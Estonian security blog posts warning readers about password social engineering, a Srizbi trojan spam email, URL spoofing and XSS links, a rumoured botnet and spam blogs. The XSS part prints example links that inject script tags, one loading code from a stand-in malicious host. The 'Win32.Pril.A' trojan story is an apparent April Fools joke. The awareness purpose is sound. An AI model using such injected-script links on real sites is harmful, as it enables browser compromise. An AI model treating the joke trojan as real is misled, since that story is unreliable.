Parooli saab kätte Å¡okolaaditahvli eest

p4242275.jpg576 kontoritöötaja peal tehtud katsest selgus, et 45% naistöötajaid ja 10% meestöötajaid olid valmis ütlema oma parooli täiesti võõrale inimesele, kui said selle eest tasuks tahvli Å¡okolaadi. Katse läbi viinud Infosecurity Europe’i üritusdirektori Claire Sellicki sõnul oli parooli küsimise ettekäändeks marketingiuuring ning Å¡okolaadi serveeriti kui vaevatasu küsimustiku täitmise eest. 62% nais- ja 60% meestöötajaid loovutas oma nime ja kontaktandmed lubaduse eest osaleda Pariisi-reisi väljaloosimisel.

Pooled kontoritöötajad väitsid end teadvat oma kolleegide salasõnu, 58% olid valmis enda oma ütlema inimesele, kes lihtsalt helistab ja väidab end olevat IT-osakonnast. 43% vahetab oma salasõna harva või üldse mitte.

Pisike õel skämm

Sain hiljaaegu oma spämmiaadressile kaks veidi erinevat, kuid sama manusega kirja:

lenocka.png

Ehk siis mulle tundmatud Leenake ja Vikulja tahavad kangesti vana tutvust uuendada ning avavad mulle ka juurdepääsu fotodele, mida ma olevat küsinud. Kirjades toodud lingile klikkides avanevad mõistagi mitte tütarlaste fotoalbumid, vaid  exe-fail, mis paigaldab arvutisse troojalase nimega Trojan.Win32.Srizbi. See üritab kustutada kõik jäljed enda paigaldamisest ning peidab end arvutis kui rootkit. Väidetavalt suudab ta end jooksutada ka Safe Mode’s, nii et eemaldada on seda tõsiselt raske. Lisaks haagib see troojalane end ka TCP/IP draiveri külge, hiilides nii mööda tulemüüridest ja tsentraalsest viirustõrjest.  Põhiliselt kasutatakse seda troojalast spämmi saatmiseks, kuid praktiliselt võib pahalane selle troojalase poolt kontrollitavas arvutis teha mida tahes.

Õnneks on saadud kirjas olev “fotoalbumi” link hästi äratuntavalt exe-lõpuline, mis peaks vähegi hoolast arvutikasutajat hoidma seda klikkimast.

URL-ide võltsimine

Internetiaadressi ehk URL-i võltsimine on üha laiemalt leviv kaval võte, mille abil pahategijad suunavad arvutikasutajaid pahatahtlikele lehekülgedele, lasevad neil alla laadida viiruseid ja muud pahavara või siis varastavad paroole ja muud väärtuslikku infot.

Igale dokumendil või muul ressursil on Internetis oma unikaalne aadress, URL. Kui soovitakse pöörduda mingi veebilehe poole, siis kirjutatakse URL veebilehitseja aadressilahtrisse. URL’id sisalduvad ka veebilehtedes, kus nad kujutavad endast hüpertekstlinke teistele veebilehtedele.

Internetiaadressi esimene osa näitab ära kasutatava protokolli (näit. HTTP), sellele järgneb domeeninimi, alamkataloogi nimi ja failinimi. Veebisaidi avalehe poole pöördumiseks on vaja ainult protokolli- ja domeeninime.

Kuidas siis internetilehekülgi võltsitakse?

Esimene tehnika:

Võtame ühe lehekülje, mis näeb välja nagu Yahoo! pärislehekülje aadress (www.yahoo.com):

http://www.yahoo550.com/image/logo.jpg?queryid=77092

URL-i algus sarnaneks nagu Yahoo! omaga (yahoo500.com), kuid tegelikult ei ole sel päris-Yahooga midagi pistmist. See lehekülg võib küll paista näiteks Yahoo! ühe teenuslehekülje, http://360.yahoo.com/ sarnane, aga tegelikult ei ole see Yahoo! vallatav lehekülg.

Küll aga kuulub Yahoo!-le näiteks http://travel.yahoo.com/. Yahoo on domeen ja travel alamdomeen, mõlemit haldab päris Yahoo!

Selle võltsimistehnika puhul kasutatakse ära tavakasutajate pealiskaudsust – enamik ei ole harjunud URL-e kuigi tähelepanelikult jälgima ning neile piisab, kui nad URL-i nimes kasvõi mõne tuttava elemendi ära tunnevad.

Teine tehnika:

Veidi tähelepanelikumate ohvrite lollitamiseks asendatakse URL-i nimes üks või osa tähti sarnaste, kuid tegelikult erinevate tähtede/numbritega. Näiteks www.hot.ee võib olla ka www.ho7.ee.

Tavalised asendused on näiteks “i” -> “I”, “O” -> “0” või siis ka “1” -> “I”. Võib olla ka juhtumeid, kus teil palutakse kohe sisse logida leheküljele www.ma1l.ee, sest vastasel juhul kustutatakse teie kirjad või konto. Tekst on, nagu ikka, inglise keeles, näiteks: “Log in with your email account quickly, otherwise it will be deleted!

Kolmas tehnika:

Eriti kahtlased on näiteks e-kirja või Messengeri sõnumiga saadetud pikad ja segased URL-id, mille lõpus on .exe laiendiga fail, näiteks http://216.12.204.2/…./scfl.exe. Niisugusel juhul võib tegemist olla viirusega, mis installib end automaatselt teie arvutisse. Õnneks hoiatab vähegi turvaline brauser teid alati, kui üritate mõnd niisugust URL-i avada.

Neljas tehnika:

Võltsitud URL-le lisatakse skript, mis üritab läbi veebisirvja turvaaugu saada kontrolli arvuti üle. Kui ohver on veebilehitsejal skriptid lubanud (ja enamasti see vaikimisi nii ka on), siis võib veebilehe lähtekoodis näha midagi niisugust:

Hello message board. This is a message.

<SCRIPT>jupp pahatahtlikku koodi</SCRIPT>

This is the end of my message.

Samuti võib kohata sellist 2-st URL-st koosnevat teksti

<A href=”http://example.com/comment.cgi? mycomment=<SCRIPT src=’http://kuriveeb/pahavara’></SCRIPT>”>Vajuta siia</A>

<A href=”http://example.com/comment.cgi? mycomment=<SCRIPT>jupp pahatahtlikku koodi</SCRIPT>”> Vajuta siia</A>

Esimeses koodijupis on skriptis selgesõnaliselt endaga ühenduv kood, mis saab siis faile või juhiseid viidatud internetileheküljelt. Teises koodijupis on viite taga lihtsalt pahatahtlik kood, mida saab end käivitada läbi veebisirvija turvaaugu.

Mida skriptid teevad?

Kui kasutaja on külastanud pahatahtlike skriptidega lehekülgi, siis halvemal juhul saab ründaja ohvri arvuti üle täieliku kontroll – eriti juhul, kui surfaja kasutab vananenud ja turvaparandusteta veebisirvijat. Ründaja näeb, mis rünnatavas arvutis parasjagu toimub, milliseid lehekülgi on kasutaja külastanud enne ja pärast skriptiga pihtasaamist, ta võib uurida kasutaja salvestatud paroolide loendit ning koguni paigaldada arvutisse täiendavat pahavara. Seda kõike siis, nagu eelpool öeldud, vananenud ja turvaparandusteta brauseri ja opsüsteemi puhul – näiteks kui kasutate veebi sirvimiseks veel Internet Exploreri versiooni 6…

Kui ründajal õnnestub sisse murda veebiserverisse, siis saab ta laadida skripti üles ka serveri hallatavale koduleheküljele. Näiteks www.rooli.ee-ga oli hiljuti selline lugu.

Niimoodi saab skripti laiali saata väga suurele hulgale surfajatele ning sellega kontrollida juba väga suurt hulka arvuteid.

Kuidas liba-URL-id levivad?

Üheks peamiseks nende leviku allikaks on spämm.  Võltsitud URL-e võidakse saata ka Messengeri või Skype’i vestlusaknasse, neid võidakse istutada foorumi- ja blogipostitustesse või siis, nagu eelnevalt öeldud, kräkitud kodulehekülgedele.

Pikemalt saab URL-ide võltsimisest lugeda CA turvablogist.

Kuulujutt: valmistatakse ette kübersõja kordust

Dmitri Infosecurityst kirjutab:

Zone-H.org community’is on liikvel järjekordne kulujutt. Nimelt räägitakse, et hetkel toimub varjatud tegevus, mis korjab tavakasutajate arvuteid botnetti uue rünnaku ettevalmistuseks. Botnet käivitub pronksiöö aastapäeval, selle abil toimuvad uued küberrünnakud.
Botneti loomiseks kasutatav MayDay pole uudne kurivara, sest sai kirjeldatud juba veebruaris . Kurivara kasutatakse backdoori tegemiseks arvutisse ja ta ei ole lihtsalt avastatav. Mitte iga viirustõrje ei pruugi reageerida!

Õnneks on Eesti arvutisüsteemid nüüd kübersõjaks paremini ette valmistatud kui aasta tagasi. Loodetavasti 🙂

Kuid omaenda arvutit saab botnetti sattumast hoida ikkagi eelkõige selle omanik, seepärast kohustuslikud turvahoiatused:  ärge kolage kahtlastel lehekülgedel, ärge avahe kahtlasi faile, hoidke oma tulemüür ja viirustõrje töökorras ning laadige regulaarselt alla operatsioonisüsteemi ja rakendusprogrammide turvaparandusi!

Tänase päeva põnevaim troojalane

F-Secure’i turvalabori spetsialistid avastasid uue, väga veidralt käituva troojalase. Win32.Pril.A nime saanud pahalane nimelt installeerib end alglaadimissektorisse, kirjutab üle BIOS-i ning asub passima momenti, mil kasutaja siseneb suvalisse sadadest üle maailma paiknevatest online-pankadest. Seejärel projtseerib troojalane võltsitud kodulehe otse VGA adapterisse ja, nagu sellest veel vähe oleks, kannab raha ohvri pangaarvele, mitte sealt minema. Mikko kirjutab, kuidas terve turvalabor testis seda veidrat nähtust mitu korda ja mitmete pangaarvetega…

Seda uut põnevat pahalast saab alla laadida siit.

Spämmiblogid

Spämmiga foorumites ning portaalide ja blogide kommentaariruumis on kõik juba ammu harjunud. Täna aga hakkas silma rämpspostitajate uus nõks – spämmiblogid. Märkasin nimelt meie oma kodumaises blog.tr.ee-s listitud blogipostitust pealkirjaga “Get Cash Now Without a Job” – no selliseid olen isegi oma spämmifiltrist tuhandete kaupa ära kustutanud. Postituse külge haagitud blogis oli neid va tüüppealkirju veelgi rohkem:

cash.png

Kommentaaride spämmifiltrid töötavad enamasti hästi, blogide eneste filtreerimine pole aga veel kuigi laialt levinud. Sestap saavadki spämmijad otse blogipostituste endi kaudu oma kahtlase väärtusega sõnumit takistamatult levitada.

Palusin ka blog.tr.ee kommentaari, Andris Reinman on probleemist teadlik:

“Antud tüüpi blogid on automaatselt raskesti avastatavad ja neile saab peale ainult siis, kui see ise silma hakkab. Nimelt on nii, et kui keegi kirjutab kuskil levinud blogisaidil, näiteks sealsamas blogspotis blogi, kuid hiljem mingitel põhjustel selle ära kustutab, siis spämmirobotid, nähes domeeni ärakukkumist, võtavad selle kiirelt üle ja topivad spämmi täis – kasutades sellega osavalt ära eelmise blogija kogutud google pageranki ja muud sellega kaasnevat.

Eriti heaks näiteks saab tuua endist suht populaarset Marta ja Potsataja blogi (mingi hetk kolis blogspotist ära wordpressi teise aadressi peale), http://martamull.blogspot.com/, mis hetkel on täidetud mingi aasia spämmiga.

Blog.tr.ee-s on samamoodi – kui inimene kustutab blog.tr.ee-s oleva blogi ära ja spämmerid võtavad domeeninime endale kiirelt üle, ei saa me kuskilt otsast teada, et midagi juhtunud on.”

Blogipuu, nii nagu ka seal listitud blogimiskeskkonnad (wordpress.com, blogger.com, blogspot.com jne) üldiselt spämmi ei salli ning kustutavad rämpsposti levitavad blogid tavaliselt meelsasti, kui neile sellest teada anda.